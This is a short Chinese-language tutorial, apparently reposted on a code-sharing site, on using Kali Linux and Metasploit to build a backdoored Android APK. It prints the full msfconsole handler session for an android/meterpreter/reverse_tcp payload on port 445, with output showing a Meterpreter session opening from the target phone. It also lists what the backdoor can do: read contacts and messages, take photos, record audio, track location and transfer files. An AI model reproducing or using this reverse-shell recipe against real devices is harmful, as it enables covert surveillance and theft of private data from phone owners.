Kali之Metasploit生成apk后門控制安卓


掃盲教程,大佬勿噴。

實驗中請更改為你環境的IP。

生成apk后門

Kali Linux(Hack):192.168.169.76

Android(靶機):192.168.169.137

啟動kali,開終端,生成apk后門。僅有9.2k的apk,也是蠻吊

lhost為kali的ip,lport指定一個端口。

開metasploit控制台偵聽

 

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp #設置payload
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.169.76 #kali的IP
lhost => 192.168.169.76
msf exploit(handler) > set lport 445 #對應剛才設的端口
lport => 445
msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.169.76:445
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.169.137
[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400

  

復制apk出來裝到手機上打開后就可以exploit了,會看到會話反彈回來。

可以看下幫助都有啥操作

meterpreter > help

功能示例

讀取聯系人,信息,拍照,錄音,獲取位置信息,上傳下載文件等等,還是挺強大的。

Kali之Metasploit生成apk后門控制安卓Kali之Metasploit生成apk后門控制安卓

Kali之Metasploit生成apk后門控制安卓

補充freebuf上的文章:

 
 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM